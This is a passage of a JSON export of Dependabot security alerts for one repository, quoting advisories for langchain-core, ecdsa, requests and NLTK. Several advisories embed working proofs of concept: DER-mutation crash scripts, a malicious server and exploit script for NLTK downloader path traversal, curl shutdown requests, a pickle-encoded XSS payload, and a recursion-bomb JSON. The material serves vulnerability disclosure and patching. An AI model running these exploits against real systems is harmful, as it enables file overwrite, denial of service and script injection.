reporter","severity":"high","identifiers":[{"value":"GHSA-qh6h-p6c9-ff54","type":"GHSA"},{"value":"CVE-2026-34070","type":"CVE"}],"references":[{"url":"https://github.com/langchain-ai/langchain/security/advisories/GHSA-qh6h-p6c9-ff54"},{"url":"https://github.com/langchain-ai/langchain/commit/27add913474e01e33bededf4096151130ba0d47c"},{"url":"https://github.com/langchain-ai/langchain/releases/tag/langchain-core==1.2.22"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34070"},{"url":"https://github.com/advisories/GHSA-qh6h-p6c9-ff54"}],"published_at":"2026-03-27T19:45:00Z","updated_at":"2026-03-31T18:41:15Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"langchain-core"},"severity":"high","vulnerable_version_range":"< 1.2.22","first_patched_version":{"identifier":"1.2.22"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","score":7.5},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00035,"percentile":0.10523},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","score":7.5},"cwes":[{"cwe_id":"CWE-22","name":"Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"langchain-core"},"severity":"high","vulnerable_version_range":"< 1.2.22","first_patched_version":{"identifier":"1.2.22"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/38","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/38","created_at":"2026-04-30T08:37:35Z","updated_at":"2026-05-13T05:27:08Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:08Z","auto_dismissed_at":null},{"number":37,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"ecdsa"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-9f5j-8jwj-x28g","cve_id":"CVE-2026-33936","summary":"python-ecdsa: Denial of Service via improper DER length validation in crafted private keys","description":"## Summary\n\nAn issue in the low-level DER parsing functions can cause unexpected exceptions to be raised from the public API functions.\n\n1. `ecdsa.der.remove_octet_string()` accepts truncated DER where the encoded length exceeds the available buffer. For example, an OCTET STRING that declares a length of 4096 bytes but provides only 3 bytes is parsed successfully instead of being rejected.\n\n2. Because of that, a crafted DER input can cause `SigningKey.from_der()` to raise an internal exception (`IndexError: index out of bounds on dimension 1`) rather than cleanly rejecting malformed DER (e.g., raising `UnexpectedDER` or `ValueError`). Applications that parse untrusted DER private keys may crash if they do not handle unexpected exceptions, resulting in a denial of service.\n\n## Impact\n\nPotential denial-of-service when parsing untrusted DER private keys due to unexpected internal exceptions, and malformed DER acceptance due to missing bounds checks in DER helper functions.\n\n## Reproduction\n\nAttach and run the following PoCs:\n\n### poc_truncated_der_octet.py\n\n```python\nfrom ecdsa.der import remove_octet_string, UnexpectedDER\n\n# OCTET STRING (0x04)\n# Declared length: 0x82 0x10 0x00 -> 4096 bytes\n# Actual body: only 3 bytes -> truncated DER\nbad = b\"\\x04\\x82\\x10\\x00\" + b\"ABC\"\n\ntry:\n body, rest = remove_octet_string(bad)\n print(\"[BUG] remove_octet_string accepted truncated DER.\")\n print(\"Declared length=4096, actual body_len=\", len(body), \"rest_len=\", len(rest))\n print(\"Body=\", body)\n print(\"Rest=\", rest)\nexcept UnexpectedDER as e:\n print(\"[OK] Rejected malformed DER:\", e)\n```\n\n- Expected: reject malformed DER when declared length exceeds available bytes\n- Actual: accepts the truncated DER and returns a shorter body\n- Example output:\n```\nParsed body_len= 3 rest_len= 0 (while declared length is 4096)\n```\n\n### poc_signingkey_from_der_indexerror.py\n\n```python\nfrom ecdsa import SigningKey, NIST256p\nimport ecdsa\n\nprint(\"ecdsa version:\", ecdsa.__version__)\n\nsk = SigningKey.generate(curve=NIST256p)\ngood = sk.to_der()\nprint(\"Good DER len:\", len(good))\n\n\ndef find_crashing_mutation(data: bytes):\n b = bytearray(data)\n\n # Try every OCTET STRING tag position and corrupt a short-form length byte\n for i in range(len(b) - 4):\n if b[i] != 0x04: # OCTET STRING tag\n continue\n\n L = b[i + 1]\n if L >= 0x80:\n # skip long-form lengths for simplicity\n continue\n\n max_possible = len(b) - (i + 2)\n if max_possible <= 10:\n continue\n\n # Claim more bytes than exist -> truncation\n newL = min(0x7F, max_possible + 20)\n b2 = bytearray(b)\n b2[i + 1] = newL\n\n try:\n SigningKey.from_der(bytes(b2))\n except Exception as e:\n return i, type(e).__name__, str(e)\n\n return None\n\n\nres = find_crashing_mutation(good)\nif res is None:\n print(\"[INFO] No exception triggered by this mutation strategy.\")\nelse:\n i, etype, msg = res\n print(\"[BUG] SigningKey.from_der raised unexpected exception type.\")\n print(\"Offset:\", i, \"Exception:\", etype, \"Message:\", msg)\n```\n\n- Expected: reject malformed DER with `UnexpectedDER` or `ValueError`\n- Actual: deterministically triggers an internal `IndexError` (DoS risk)\n- Example output:\n```\nResult: (5, 'IndexError', 'index out of bounds on dimension 1')\n```\n\n## Suggested fix\n\nAdd “declared length must fit buffer” checks in DER helper functions similarly to the existing check in `remove_sequence()`:\n\n- `remove_octet_string()`\n- `remove_constructed()`\n- `remove_implicit()`\n\nAdditionally, consider catching unexpected internal exceptions in DER key parsing paths and re-raising them as `UnexpectedDER` to avoid crashy failure modes.\n\n## Credit\n\nMohamed Abdelaal (@0xmrma)","severity":"medium","identifiers":[{"value":"GHSA-9f5j-8jwj-x28g","type":"GHSA"},{"value":"CVE-2026-33936","type":"CVE"}],"references":[{"url":"https://github.com/tlsfuzzer/python-ecdsa/security/advisories/GHSA-9f5j-8jwj-x28g"},{"url":"https://github.com/tlsfuzzer/python-ecdsa/commit/bd66899550d7185939bf27b75713a2ac9325a9d3"},{"url":"https://github.com/tlsfuzzer/python-ecdsa/releases/tag/python-ecdsa-0.19.2"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33936"},{"url":"https://github.com/advisories/GHSA-9f5j-8jwj-x28g"}],"published_at":"2026-03-27T15:56:01Z","updated_at":"2026-03-30T20:17:12Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"ecdsa"},"severity":"medium","vulnerable_version_range":"< 0.19.2","first_patched_version":{"identifier":"0.19.2"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L","score":5.3},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00053,"percentile":0.16595},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L","score":5.3},"cwes":[{"cwe_id":"CWE-20","name":"Improper Input Validation"},{"cwe_id":"CWE-130","name":"Improper Handling of Length Parameter Inconsistency"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"ecdsa"},"severity":"medium","vulnerable_version_range":"< 0.19.2","first_patched_version":{"identifier":"0.19.2"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/37","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/37","created_at":"2026-04-30T08:37:35Z","updated_at":"2026-05-13T05:27:08Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:08Z","auto_dismissed_at":null},{"number":36,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"requests"},"manifest_path":"methods/evermemos/uv.lock","scope":"development","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-gc5v-m9x4-r6x2","cve_id":"CVE-2026-25645","summary":"Requests has Insecure Temp File Reuse in its extract_zipped_paths() utility function","description":"### Impact\nThe `requests.utils.extract_zipped_paths()` utility function uses a predictable filename when extracting files from zip archives into the system temporary directory. If the target file already exists, it is reused without validation. A local attacker with write access to the temp directory could pre-create a malicious file that would be loaded in place of the legitimate one.\n\n### Affected usages\n**Standard usage of the Requests library is not affected by this vulnerability.** Only applications that call `extract_zipped_paths()` directly are impacted.\n\n### Remediation\nUpgrade to at least Requests 2.33.0, where the library now extracts files to a non-deterministic location.\n\nIf developers are unable to upgrade, they can set `TMPDIR` in their environment to a directory with restricted write access.","severity":"medium","identifiers":[{"value":"GHSA-gc5v-m9x4-r6x2","type":"GHSA"},{"value":"CVE-2026-25645","type":"CVE"}],"references":[{"url":"https://github.com/psf/requests/security/advisories/GHSA-gc5v-m9x4-r6x2"},{"url":"https://github.com/psf/requests/commit/66d21cb07bd6255b1280291c4fafb71803cdb3b7"},{"url":"https://github.com/psf/requests/releases/tag/v2.33.0"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25645"},{"url":"https://github.com/advisories/GHSA-gc5v-m9x4-r6x2"}],"published_at":"2026-03-25T16:56:28Z","updated_at":"2026-03-27T22:07:43Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"requests"},"severity":"medium","vulnerable_version_range":"< 2.33.0","first_patched_version":{"identifier":"2.33.0"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N","score":4.4},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":5.0e-05,"percentile":0.00243},"cvss":{"vector_string":"CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N","score":4.4},"cwes":[{"cwe_id":"CWE-377","name":"Insecure Temporary File"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"requests"},"severity":"medium","vulnerable_version_range":"< 2.33.0","first_patched_version":{"identifier":"2.33.0"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/36","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/36","created_at":"2026-04-30T08:37:35Z","updated_at":"2026-05-13T05:27:08Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:08Z","auto_dismissed_at":null},{"number":35,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"nltk"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-469j-vmhf-r6v7","cve_id":"CVE-2026-33236","summary":"NLTK has a Downloader Path Traversal Vulnerability (AFO) - Arbitrary File Overwrite","description":"## Vulnerability Description\n\nThe NLTK downloader does not validate the `subdir` and `id` attributes when processing remote XML index files. Attackers can control a remote XML index server to provide malicious values containing path traversal sequences (such as `../`), which can lead to:\n\n1. **Arbitrary Directory Creation**: Create directories at arbitrary locations in the file system\n2. **Arbitrary File Creation**: Create arbitrary files\n3. **Arbitrary File Overwrite**: Overwrite critical system files (such as `/etc/passwd`, `~/.ssh/authorized_keys`, etc.)\n\n## Vulnerability Principle\n\n### Key Code Locations\n\n**1. XML Parsing Without Validation** (`nltk/downloader.py:253`)\n```python\nself.filename = os.path.join(subdir, id + ext)\n```\n- `subdir` and `id` are directly from XML attributes without any validation\n\n**2. Path Construction Without Checks** (`nltk/downloader.py:679`)\n```python\nfilepath = os.path.join(download_dir, info.filename)\n```\n- Directly uses `filename` which may contain path traversal\n\n**3. Unrestricted Directory Creation** (`nltk/downloader.py:687`)\n```python\nos.makedirs(os.path.join(download_dir, info.subdir), exist_ok=True)\n```\n- Can create arbitrary directories outside the download directory\n\n**4. File Writing Without Protection** (`nltk/downloader.py:695`)\n```python\nwith open(filepath, \"wb\") as outfile:\n```\n- Can write to arbitrary locations in the file system\n\n### Attack Chain\n\n```\n1. Attacker controls remote XML index server\n ↓\n2. Provides malicious XML: \n ↓\n3. Victim executes: downloader.download('passwd')\n ↓\n4. Package.fromxml() creates object, filename = \"../../etc/passwd.zip\"\n ↓\n5. _download_package() constructs path: download_dir + \"../../etc/passwd.zip\"\n ↓\n6. os.makedirs() creates directory: download_dir + \"../../etc\"\n ↓\n7. open(filepath, \"wb\") writes file to /etc/passwd.zip\n ↓\n8. System file is overwritten!\n```\n\n## Impact Scope\n1. **System File Overwrite**\n\n## Reproduction Steps\n\n### Environment Setup\n\n1. Install NLTK\n```bash\npip install nltk\n```\n\n2. Prepare malicious server and exploit script (see PoC section)\n\n### Reproduction Process\n\n**Step 1: Start malicious server**\n```bash\npython3 malicious_server.py\n```\n\n**Step 2: Run exploit script**\n```bash\npython3 exploit_vulnerability.py\n```\n\n**Step 3: Verify results**\n```bash\nls -la /tmp/test_file.zip\n```\n\n## Proof of Concept\n\n### Malicious Server (malicious_server.py)\n\n```python\n#!/usr/bin/env python3\n\"\"\"Malicious HTTP Server - Provides XML index with path traversal\"\"\"\nimport os\nimport tempfile\nimport zipfile\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\n\n# Create temporary directory\nserver_dir = tempfile.mkdtemp(prefix=\"nltk_malicious_\")\n\n# Create malicious XML (contains path traversal)\nmalicious_xml = \"\"\"\n\n \n \n \n\n\"\"\"\n\n# Save files\nwith open(os.path.join(server_dir, \"malicious_index.xml\"), \"w\") as f:\n f.write(malicious_xml)\n\nwith zipfile.ZipFile(os.path.join(server_dir, \"test.zip\"), \"w\") as zf:\n zf.writestr(\"test.txt\", \"Path traversal attack!\")\n\n# HTTP Handler\nclass Handler(BaseHTTPRequestHandler):\n def do_GET(self):\n if self.path == '/malicious_index.xml':\n self.send_response(200)\n self.send_header('Content-type', 'application/xml')\n self.end_headers()\n with open(os.path.join(server_dir, 'malicious_index.xml'), 'rb') as f:\n self.wfile.write(f.read())\n elif self.path == '/test.zip':\n self.send_response(200)\n self.send_header('Content-type', 'application/zip')\n self.end_headers()\n with open(os.path.join(server_dir, 'test.zip'), 'rb') as f:\n self.wfile.write(f.read())\n else:\n self.send_response(404)\n self.end_headers()\n \n def log_message(self, format, *args):\n pass\n\n# Start server\nif __name__ == \"__main__\":\n port = 8888\n server = HTTPServer((\"0.0.0.0\", port), Handler)\n print(f\"Malicious server started: http://127.0.0.1:{port}/malicious_index.xml\")\n print(\"Press Ctrl+C to stop\")\n try:\n server.serve_forever()\n except KeyboardInterrupt:\n print(\"\\nServer stopped\")\n```\n\n### Exploit Script (exploit_vulnerability.py)\n\n```python\n#!/usr/bin/env python3\n\"\"\"AFO Vulnerability Exploit Script\"\"\"\nimport os\nimport tempfile\n\ndef exploit(server_url=\"http://127.0.0.1:8888/malicious_index.xml\"):\n download_dir = tempfile.mkdtemp(prefix=\"nltk_exploit_\")\n print(f\"Download directory: {download_dir}\")\n \n # Exploit vulnerability\n from nltk.downloader import Downloader\n downloader = Downloader(server_index_url=server_url, download_dir=download_dir)\n downloader.download(\"test_file\", quiet=True)\n \n # Check results\n expected_path = \"/tmp/test_file.zip\"\n if os.path.exists(expected_path):\n print(f\"\\n✗ Exploit successful! File written to: {expected_path}\")\n print(f\"✗ Path traversal attack successful!\")\n else:\n print(f\"\\n? File not found, download may have failed\")\n\nif __name__ == \"__main__\":\n exploit()\n```\n\n### Execution Results\n\n```\n✗ Exploit successful! File written to: /tmp/test_file.zip\n✗ Path traversal attack successful!\n```","severity":"high","identifiers":[{"value":"GHSA-469j-vmhf-r6v7","type":"GHSA"},{"value":"CVE-2026-33236","type":"CVE"}],"references":[{"url":"https://github.com/nltk/nltk/security/advisories/GHSA-469j-vmhf-r6v7"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33236"},{"url":"https://github.com/nltk/nltk/commit/89fe2ec2c6bae6e2e7a46dad65cc34231976ed8a"},{"url":"https://github.com/advisories/GHSA-469j-vmhf-r6v7"}],"published_at":"2026-03-19T12:42:42Z","updated_at":"2026-03-25T18:21:28Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"nltk"},"severity":"high","vulnerable_version_range":"<= 3.9.2","first_patched_version":null}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H","score":8.1},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00019,"percentile":0.0532},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H","score":8.1},"cwes":[{"cwe_id":"CWE-22","name":"Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"nltk"},"severity":"high","vulnerable_version_range":"<= 3.9.2","first_patched_version":null},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/35","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/35","created_at":"2026-04-30T08:37:35Z","updated_at":"2026-05-13T05:27:08Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:08Z","auto_dismissed_at":null},{"number":34,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"nltk"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-jm6w-m3j8-898g","cve_id":"CVE-2026-33231","summary":"Unauthenticated remote shutdown in nltk.app.wordnet_app","description":"### Summary\n`nltk.app.wordnet_app` allows unauthenticated remote shutdown of the local WordNet Browser HTTP server when it is started in its default mode. A simple `GET /SHUTDOWN%20THE%20SERVER` request causes the process to terminate immediately via `os._exit(0)`, resulting in a denial of service.\n\n### Details\nThe vulnerable logic is in `nltk/app/wordnet_app.py`:\n\n- [`nltk/app/wordnet_app.py:242`](/mnt/Data/my_brains/test/nltk/nltk/app/wordnet_app.py#L242)\n - The server listens on all interfaces:\n - `server = HTTPServer((\"\", port), MyServerHandler)`\n\n- [`nltk/app/wordnet_app.py:87`](/mnt/Data/my_brains/test/nltk/nltk/app/wordnet_app.py#L87)\n - Incoming requests are checked for the exact path:\n - `if unquote_plus(sp) == \"SHUTDOWN THE SERVER\":`\n\n- [`nltk/app/wordnet_app.py:88`](/mnt/Data/my_brains/test/nltk/nltk/app/wordnet_app.py#L88)\n - The shutdown protection only depends on `server_mode`\n\n- [`nltk/app/wordnet_app.py:93`](/mnt/Data/my_brains/test/nltk/nltk/app/wordnet_app.py#L93)\n - In the default mode (`runBrowser=True`, therefore `server_mode=False`), the handler terminates the process directly:\n - `os._exit(0)`\n\nThis means any party that can reach the listening port can stop the service with a single unauthenticated GET request when the browser is started in its normal mode.\n\n### PoC\n1. Start the WordNet Browser in Docker in its default mode:\n\n```bash\ndocker run -d --name nltk-wordnet-web-default-retest -p 8004:8004 \\\n nltk-sandbox \\\n python -c \"import nltk; nltk.download('wordnet', quiet=True); from nltk.app.wordnet_app import wnb; wnb(8004, True)\"\n```\n\n2. Confirm the service is reachable:\n\n```bash\ncurl -s -o /tmp/wn_before.html -w '%{http_code}\\n' 'http://127.0.0.1:8004/'\n```\n\nObserved result:\n\n```text\n200\n```\n\n3. Trigger shutdown:\n\n```bash\ncurl -s -o /tmp/wn_shutdown.html -w '%{http_code}\\n' 'http://127.0.0.1:8004/SHUTDOWN%20THE%20SERVER'\n```\n\nObserved result:\n\n```text\n000\n```\n\n4. Verify the service is no longer available:\n\n```bash\ncurl -s -o /tmp/wn_after.html -w '%{http_code}\\n' 'http://127.0.0.1:8004/'\ndocker ps -a --filter name=nltk-wordnet-web-default-retest --format '{{.Names}}\\t{{.Status}}'\ndocker logs nltk-wordnet-web-default-retest\n```\n\nObserved results:\n\n```text\n000\nnltk-wordnet-web-default-retest Exited (0)\nServer shutting down!\n```\n\n### Impact\nThis is an unauthenticated denial-of-service issue in the NLTK WordNet Browser HTTP server.\n\nAny reachable client can terminate the service remotely when the application is started in its default mode. The impact is limited to service availability, but it is still security-relevant because:\n\n- the route is accessible over HTTP\n- no authentication or CSRF-style confirmation is required\n- the server listens on all interfaces by default\n- the process exits immediately instead of performing a controlled shutdown\n\nThis primarily affects users who run `nltk.app.wordnet_app` and expose or otherwise allow access to its listening port.","severity":"high","identifiers":[{"value":"GHSA-jm6w-m3j8-898g","type":"GHSA"},{"value":"CVE-2026-33231","type":"CVE"}],"references":[{"url":"https://github.com/nltk/nltk/security/advisories/GHSA-jm6w-m3j8-898g"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33231"},{"url":"https://github.com/nltk/nltk/commit/bbaae83db86a0f49e00f5b0db44a7254c268de9b"},{"url":"https://github.com/advisories/GHSA-jm6w-m3j8-898g"}],"published_at":"2026-03-19T12:42:20Z","updated_at":"2026-04-25T01:23:11Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"nltk"},"severity":"high","vulnerable_version_range":"<= 3.9.3","first_patched_version":{"identifier":"3.9.4"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00019,"percentile":0.05214},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cwes":[{"cwe_id":"CWE-306","name":"Missing Authentication for Critical Function"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"nltk"},"severity":"high","vulnerable_version_range":"<= 3.9.3","first_patched_version":{"identifier":"3.9.4"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/34","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/34","created_at":"2026-04-30T08:37:35Z","updated_at":"2026-05-13T05:27:08Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:08Z","auto_dismissed_at":null},{"number":33,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"nltk"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-gfwx-w7gr-fvh7","cve_id":"CVE-2026-33230","summary":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in nltk","description":"### Summary\n`nltk.app.wordnet_app` contains a reflected cross-site scripting issue in the `lookup_...` route. A crafted `lookup_` URL can inject arbitrary HTML/JavaScript into the response page because attacker-controlled `word` data is reflected into HTML without escaping. This impacts users running the local WordNet Browser server and can lead to script execution in the browser origin of that application.\n\n### Details\nThe vulnerable flow is in `nltk/app/wordnet_app.py`:\n\n- [`nltk/app/wordnet_app.py:144`](/mnt/Data/my_brains/test/nltk/nltk/app/wordnet_app.py#L144)\n - Requests starting with `lookup_` are handled as HTML responses:\n - `page, word = page_from_href(sp)`\n\n- [`nltk/app/wordnet_app.py:755`](/mnt/Data/my_brains/test/nltk/nltk/app/wordnet_app.py#L755)\n - `page_from_href()` calls `page_from_reference(Reference.decode(href))`\n\n- [`nltk/app/wordnet_app.py:769`](/mnt/Data/my_brains/test/nltk/nltk/app/wordnet_app.py#L769)\n - `word = href.word`\n\n- [`nltk/app/wordnet_app.py:796`](/mnt/Data/my_brains/test/nltk/nltk/app/wordnet_app.py#L796)\n - If no results are found, `word` is inserted directly into the HTML body:\n - `body = \"The word or words '%s' were not found in the dictionary.\" % word`\n\nThis is inconsistent with the `search` route, which does escape user input:\n\n- [`nltk/app/wordnet_app.py:136`](/mnt/Data/my_brains/test/nltk/nltk/app/wordnet_app.py#L136)\n - `word = html.escape(...)`\n\nAs a result, a malicious `lookup_...` payload can inject script into the response page.\n\nThe issue is exploitable because:\n\n- `Reference.decode()` accepts attacker-controlled base64-encoded pickle data for the URL state.\n- The decoded `word` is reflected into HTML without `html.escape()`.\n- The server is started with `HTTPServer((\"\", port), MyServerHandler)`, so it listens on all interfaces by default, not just `localhost`.\n\n### PoC\n1. Start the WordNet Browser in an isolated Docker environment:\n\n```bash\ndocker run -d --name nltk-wordnet-web -p 8002:8002 \\\n nltk-sandbox \\\n python -c \"import nltk; nltk.download('wordnet', quiet=True); from nltk.app.wordnet_app import wnb; wnb(8002, False)\"\n```\n\n2. Use the following crafted payload, which decodes to:\n\n```python\n(\"\", {})\n```\n\nEncoded payload:\n\n```text\ngAWVIQAAAAAAAACMGTxzY3JpcHQ-YWxlcnQoMSk8L3NjcmlwdD6UfZSGlC4=\n```\n\n3. Request the vulnerable route:\n\n```bash\ncurl -s \"http://127.0.0.1:8002/lookup_gAWVIQAAAAAAAACMGTxzY3JpcHQ-YWxlcnQoMSk8L3NjcmlwdD6UfZSGlC4=\"\n```\n\n4. Observed result:\n\n```text\nThe word or words '' were not found in the dictionary.\n```\n\n\n\nI also validated the issue directly at function level in Docker:\n\n```python\nimport base64\nimport pickle\n\nfrom nltk.app.wordnet_app import page_from_href\n\npayload = base64.urlsafe_b64encode(\n pickle.dumps((\"\", {}), -1)\n).decode()\n\npage, word = page_from_href(payload)\nprint(word)\nprint(\"\" in page)\n```\n\nObserved output:\n\n```text\nWORD= \nHAS_SCRIPT= True\n```\n\n### Impact\nThis is a reflected XSS issue in the NLTK WordNet Browser web UI.\n\nAn attacker who can convince a user to open a crafted `lookup_...` URL can execute arbitrary JavaScript in the origin of the local WordNet Browser application. This can be used to:\n\n- run arbitrary script in the browser tab\n- manipulate the page content shown to the user\n- issue same-origin requests to other WordNet Browser routes\n- potentially trigger available UI actions in that local app context\n\nThis primarily impacts users who run `nltk.app.wordnet_app` as a local or self-hosted HTTP service and open attacker-controlled links.","severity":"medium","identifiers":[{"value":"GHSA-gfwx-w7gr-fvh7","type":"GHSA"},{"value":"CVE-2026-33230","type":"CVE"}],"references":[{"url":"https://github.com/nltk/nltk/security/advisories/GHSA-gfwx-w7gr-fvh7"},{"url":"https://github.com/nltk/nltk/commit/1c3f799607eeb088cab2491dcf806ae83c29ad8f"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33230"},{"url":"https://github.com/nltk/nltk/commit/40d0bc1d484a3458d6a63ecb5ba4957ab16ba14e"},{"url":"https://github.com/advisories/GHSA-gfwx-w7gr-fvh7"}],"published_at":"2026-03-18T20:23:33Z","updated_at":"2026-03-25T18:21:03Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"nltk"},"severity":"medium","vulnerable_version_range":"<= 3.9.3","first_patched_version":{"identifier":"3.9.4"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","score":6.1},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00017,"percentile":0.04074},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","score":6.1},"cwes":[{"cwe_id":"CWE-79","name":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"nltk"},"severity":"medium","vulnerable_version_range":"<= 3.9.3","first_patched_version":{"identifier":"3.9.4"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/33","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/33","created_at":"2026-04-30T08:37:35Z","updated_at":"2026-05-13T05:27:08Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:08Z","auto_dismissed_at":null},{"number":32,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"nltk"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-rf74-v2fm-23pw","cve_id":null,"summary":"Natural Language Toolkit (NLTK) has unbounded recursion in JSONTaggedDecoder.decode_obj() may cause DoS","description":"### Summary\n`JSONTaggedDecoder.decode_obj()` in `nltk/jsontags.py` calls itself \nrecursively without any depth limit. A deeply nested JSON structure \nexceeding `sys.getrecursionlimit()` (default: 1000) will raise an \nunhandled `RecursionError`, crashing the Python process.\n\n### Affected code\nFile: `nltk/jsontags.py`, lines 47–52\n```python\n@classmethod\ndef decode_obj(cls, obj):\n if isinstance(obj, dict):\n obj = {key: cls.decode_obj(val) for (key, val) in obj.items()}\n elif isinstance(obj, list):\n obj = list(cls.decode_obj(val) for val in obj)\n```\n\n### Proof of Concept\n```python\nimport sys, json\nfrom nltk.jsontags import JSONTaggedDecoder\n\ndepth = sys.getrecursionlimit() + 50 # e.g. 1050\npayload = '{\"x\":' * depth + \"null\" + \"}\" * depth\n\n# Raises RecursionError, crashing the process\njson.loads(payload, cls=JSONTaggedDecoder)\n```\n\n### Impact\nAny code path that passes externally-supplied JSON to \n`JSONTaggedDecoder` is vulnerable to denial of service.\nThe severity depends on whether such a path exists in the \ncalling code (e.g. `nltk/data.py`).\n\n### Suggested Fix\nAdd a depth parameter with a hard limit:\n```python\n@classmethod\ndef decode_obj(cls, obj, _depth=0):\n if _depth > 100:\n raise ValueError(\"JSON nesting too deep\")\n if isinstance(obj, dict):\n obj = {key: cls.decode_obj(val, _depth + 1) \n for (key, val) in obj.items()}\n elif isinstance(obj, list):\n obj = list(cls.decode_obj(val, _depth + 1) for val in 